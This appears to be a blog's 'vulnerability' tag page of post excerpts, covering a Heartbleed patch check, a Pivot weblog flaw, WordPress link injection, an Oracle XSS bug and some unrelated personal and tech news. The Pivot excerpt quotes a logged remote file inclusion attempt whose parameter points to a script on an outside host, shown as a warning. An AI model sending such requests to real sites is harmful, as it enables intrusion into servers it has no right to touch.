Tag: vulnerability
-
If you're in the mad scramble to patch the Heartbleed vulnerability in OpenSSL on your Ubuntu servers but you need to see some documentation, look in your /usr/share/doc/openssl/changelog.Debian.gz file. If you see the following at the very top of the file, you're patched:
openssl (1.0.1-4ubuntu5.12) precise-security; urgency=medium
  * SECURITY UPDATE: side-channel attack on Montgomery ladder implementation
    - debian/patches/CVE-2014-0076.patch: add and use constant time swap in
      crypto/bn/bn.h, crypto/bn/bn_lib.c, crypto/ec/ec2_mult.c,
      util/libeay.num.
    - CVE-2014-0076
  * SECURITY UPDATE: memory disclosure in TLS heartbeat extension …
Read more...
-
Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:
a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …
Read more...
-
For the past couple of weeks the information security community has been noticing someone exploiting a new vulnerability in the WordPress blogging software that lets the attacker inject arbitrary HTML code into the content from outside. So far, what has been seen is an HTML entity containing multiple hyperlinks to other sites, presumably for the purpose of artificially bumping up someone's search engine rankings. Both the height and width of the injected HTML code are usually set to zero pixels each, but I've seen a couple of instances of one-by-one entities as well. It stands to reason that pretty much …
Read more...
-
Oracle is best known for its database system, which many thousands of companies make use of in some capacity or another. It's big, it's bad, it's complex, but it's also got some amazing features, like clustering and replication that many other databases (open source and otherwise) can't hold a candle to, assuming that you understand it well enough to make it work. It's a complex beast, no two ways about it. That complexity, however, is no excuse for them taking two years to patch a security vulnerability in Oracle 10. It's a cross-site scripting bug in the enterprise search subsystem …
Read more...
-
Note to self: All the walking in DC is making me go through tennis socks faster than I can replace them. I've blown through six socks in three days because they've ripped through without warning while walking down the street. This is a little annoying because I feel like a slob. It's 2007, so the time for upgrading is probably upon most of us. To wit, here's something that should leave just about everyone drooling in anticipation: This coming Thursday, Hitachi will put their one terabyte hard drives on the consumer market with an opening price of $399 US. The drives …
Read more...
-
Here's an article just in from the "In other news, fire is hot and water is wet" department: A study shows that studies funded by companies tend to frame the products of those companies in a better light. A three-step study of 111 dietetic studies of soda, milk, and water was performed in such a way that the groups of researchers were ignorant of the conclusions of the others (the protocol is outlined in the article; it's pretty neat) to determine if the findings of the studies would be helpful or harmful to the bottom line of the organisation …
Read more...